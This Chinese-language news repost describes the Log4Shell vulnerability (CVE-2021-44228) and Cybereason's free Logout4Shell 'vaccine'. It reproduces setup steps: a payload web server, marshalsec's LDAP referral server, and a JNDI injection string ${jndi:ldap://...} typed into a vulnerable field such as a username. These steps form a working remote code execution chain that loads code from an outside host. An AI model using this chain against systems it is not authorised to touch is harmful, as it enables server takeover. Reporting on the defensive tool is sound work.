
如果您运行的是 2.0-beta9 到 2.14.1(含)之间的 Apache Log4j 版本,则需要注意 Log4Shell 漏洞。 跟踪为 CVE-2021-44228,这是开源基于 Java 的日志记录实用程序中的一个严重且容易被利用的 RCE 缺陷。
攻击者可以通过简单地使用特定字符串作为浏览器用户代理来利用安全漏洞执行远程攻击。 尽管 Apache Software Foundation 已经发布了 Log4j 2.15.0 的补丁版本,但并不是每个人都能够立即更新,而这正是攻击者所利用的。 值得庆幸的是,安全公司 Cybereason 发布了一种名为 Logout4Shell 的“预防措施”,可以防止 Log4Shell。

Apache Log4j2
该公司提供了免费的“预防措施”,它通过对自身使用该错误来修复该缺陷。
Cybereason 在一篇博客文章中谈到该漏洞时说:“2021 年 12 月 9 日,该项目的 GitHub 上披露了一个影响 Apache Log4j 2.0 到 2.14.1 版本的漏洞。该漏洞被称为‘Log4Shell’,并且具有最高的可能 严重性等级为 10。Apache 无处不在,占世界上所有 Web 服务器的近三分之一,这使其成为潜在的灾难性缺陷。
Cybereason 公司继续说:
Log4j 是一个开源 Java 日志库,广泛用于全球范围内的一系列软件应用程序和服务。 该漏洞允许威胁参与者控制任何基于 Java 的面向 Internet 的服务器并进行远程代码执行 (RCE) 攻击。
世界上大多数登录屏幕通常会审核失败的登录尝试,这意味着几乎每个使用 Log4j 的经过身份验证的页面都容易受到攻击。 浏览器搜索栏也经常被记录,并将系统暴露给这个缺陷。
利用该漏洞相当简单。 攻击者可以通过简单地发送由 Log4j 记录的恶意代码字符串来利用该漏洞。 此时,该漏洞将允许攻击者加载任意 Java 代码并控制服务器。
Cybereason 在 GitHub 上发布了它的 Logout4Shell 预防措施,并提供了以下说明:
1、下载此文件并构建它
1
2
3
4 git clone https://github.com/cybereason/Logout4Shell.git
构建它 - mvn package
cd target/classes
运行网络服务器 - python3 -m http.server 8888
2、下载、构建并运行 Marshalsec 的 ldap 服务器
1
2
3 git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<IP_OF_PYTHON_SERVER_FROM_STEP_1>:8888/#Log4jRCE"
3、对服务器进行免疫
1 在易受攻击的字段(例如用户名)中输入 ${jndi:ldap://<IP_OF_LDAP_SERVER_FROM_STEP_2>:1389/a}
更多信息和代码可以在这里找到:点击访问
文章名称:《Cybereason 发布了针对 Apache Log4j 中严重 Log4Shell 漏洞的免费修复程序》
文章固定链接:http://www.dayanzai.me/fix-for-serious-log4shell.html
本站资源仅供个人学习交流,请于下载后 24 小时内删除,不允许用于商业用途,否则法律问题自行承担。
猜你喜欢
- 2019-03-10机械,工业工程和技术计算 MITCalc 1.74 + x64 中文多语免费版
- 2018-11-02数据库管理工具 SQLyog Ultimate 13.1.1.0 + x64 中文多语免费版
- 2022-05-10Opera 浏览器 Opera 86.0 Build 4363.59 + x64 中文多语免费版
- 2015-02-27MP3 转 SWF 软件 MP3 to SWF Converter 3.0.968 中文汉化版
- 2020-03-11如何使用 SQL 语句批量替换修改 WordPress 文章内容
相关推荐
- 2022-05-04轻量化渲染系统 SimLab Composer 10.24.5 x64 中文多语免费版
- 2021-08-26开源 3D 人物角色建模软件 MakeHuman 1.2.0 中文多语免费版
- 2021-09-02安卓多功能检测工具箱 Smart Tools 19.8 中文多语免费版
- 2021-12-08Python IDE 编程工具 JetBrains PyCharm Professional 2021.3 中文免费版
- 2016-02-122015 年十大网络流行语收集整理发布!